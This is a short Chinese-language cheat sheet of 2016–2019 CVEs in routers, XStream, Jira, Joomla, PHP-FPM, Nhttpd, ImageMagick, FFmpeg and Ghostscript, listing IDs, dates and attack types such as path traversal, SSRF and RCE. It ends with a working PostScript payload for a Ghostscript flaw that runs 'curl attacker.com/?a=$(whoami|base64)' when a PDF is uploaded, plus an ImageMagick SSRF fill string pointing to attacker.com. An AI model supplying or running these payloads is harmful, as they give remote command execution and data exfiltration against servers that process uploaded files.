热门CVE记录(一)

路由器

CVE-2019-16920 | 20191005 | CVE-2019-16920 poc

java

xstream

CVE-2019-10173 | 20190720 | 反序列化

jira

CVE-2019-14994 | 20190919 | url path traversal | /..;/
CVE-2019–11581|20190601|rce | 印象笔记
CVE-2019-8451 | 20190925 | ssrf | ssrf png

php

joomla3.4.6rce | 20191008|exp

php RCE CVE-2019-11043 | 20191024 | 攻击工具

Nhttpd

CVE-2019-16278 | 20191015 | url path traversal ice CVE-2019-16278

SSRF

Image / Video converters : Image magick : CVE-2016–3718(fill ‘url(http://attacker.com/)') CVE-2016–3718 / FFMPEG : CVE-2017–9993 (gen_xbin_playlist(playlist_location))

postscript

CVE-2016-3714
CVE-2018-16509
CVE-2019-6116
CVE-2016-7976 RCE on PDF upload:

1
2
3
4
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit